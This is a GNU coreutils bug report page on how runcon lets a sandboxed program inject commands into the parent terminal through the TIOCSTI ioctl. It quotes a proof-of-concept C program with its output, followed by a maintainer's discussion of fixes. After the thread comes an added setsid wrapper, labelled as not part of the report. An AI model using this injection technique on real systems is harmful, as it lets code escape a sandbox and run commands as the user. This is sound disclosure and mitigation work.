GNU bug report logs - #24541
runcon tty hijacking via TIOCSTI ioctl


Package: coreutils;

Reported by: up201407890 <at> alunos.dcc.fc.up.pt

Date: Sun, 25 Sep 2016 15:58:02 UTC

Severity: normal

Done: Paul Eggert <eggert <at> cs.ucla.edu>

Bug is archived. No further changes may be made.



Message #14 received at 24541 <at> debbugs.gnu.org:

From: Pádraig Brady <P <at> draigBrady.com>
To: up201407890 <at> alunos.dcc.fc.up.pt, 24541 <at> debbugs.gnu.org
Subject: Re: bug#24541: runcon tty hijacking via TIOCSTI ioctl
Date: Mon, 26 Sep 2016 11:18:10 +0100
On 25/09/16 12:39, up201407890 <at> alunos.dcc.fc.up.pt wrote:
> When executing a program via the runcon utility, the nonpriv session
> can escape to the parent session by using the TIOCSTI ioctl to push
> characters into the terminal's input buffer, allowing an attacker to
> execute arbitrary commands without the SELinux security context.
> 
> $ cat test.c
> #include <unistd.h>
> #include <sys/ioctl.h>
> 
> int main()
> {
>    char *cmd = "id\n";
>    while(*cmd)
>     ioctl(0, TIOCSTI, cmd++);
>    execlp("/bin/id", "id", NULL);
> }
> $ gcc test.c -o test
> $ runcon -t sandbox_t ./test
> id
> uid=1000 gid=1000 groups=1000  
> context=unconfined_u:unconfined_r:sandbox_t:s0-s0:c0.c1023
> $ id   <--- did not type this
> uid=1000(saken) gid=1000(saken) groups=1000(saken)
> context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
> 
> This issue has been recently patched in the SELinux sandbox (CVE-2016-7545):
> https://github.com/SELinuxProject/selinux/commit/acca96a135a4d2a028ba9b636886af99c0915379

There are side effects to that though, like not being able to background tasks etc.?

There's a collection of links on the issue at https://bugs.debian.org/816320

If setsid was an option, one could use `runcon ... setsid the_command`,
though that would be a less secure operation by default.

The same issue impacts chroot(1) somewhat also.

I'm not sure of the best fix here.

thanks,
Pádraig
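The setsid approach Pádraig mentions, as an added example that is not code from the bug report or from coreutils: a small wrapper that runs its argument in a new session so the kernel refuses TIOCSTI on the inherited terminal. `in_new_session`, `run_detached` and `probe_detached_child` are names I made up, and the block assumes Linux semantics for TIOCSTI.

```c
/* Added example, not code from the bug report or coreutils. Starting the
 * command in a new session leaves it with no controlling terminal; Linux
 * honours TIOCSTI only on the caller's controlling tty (EPERM otherwise),
 * so the child cannot inject keystrokes into the parent shell. Cost, as
 * the thread notes: the child loses job control (no ^Z, no bg/fg). */
#include <fcntl.h>
#include <stdio.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fork; in the child call setsid() (a fresh child is never a process-group
 * leader, so this succeeds), run fn(argv) and exit with its value. The
 * parent returns the child's exit status, or -1 on fork/wait failure. */
static int in_new_session(int (*fn)(char *const *), char *const *argv)
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (setsid() < 0) _exit(126);
        _exit(fn(argv) & 0xff);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Child body: 1 if a controlling tty is still attached, else 0. */
static int tty_probe(char *const *unused)
{
    int fd = open("/dev/tty", O_RDONLY | O_NOCTTY); /* ENXIO once detached */
    (void)unused;
    if (fd < 0) return 0;
    close(fd);
    return 1;
}

/* Child body: exec the command; 127 if the exec itself fails. */
static int exec_argv(char *const *argv)
{
    execvp(argv[0], argv);
    return 127;
}

int probe_detached_child(void) { return in_new_session(tty_probe, NULL); }
int run_detached(char *const argv[]) { return in_new_session(exec_argv, argv); }
int main(int argc, char *argv[])
{
    if (argc < 2) { fprintf(stderr, "usage: %s cmd [args...]\n", argv[0]); return 2; }
    return run_detached(argv + 1); /* e.g. runcon -t sandbox_t ./wrapper ./test */
}
```

A child that retains CAP_SYS_ADMIN can still issue TIOCSTI whatever its session, so the wrapper only removes the terminal relationship; it does not replace an SELinux or seccomp rule denying the ioctl.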

GNU bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.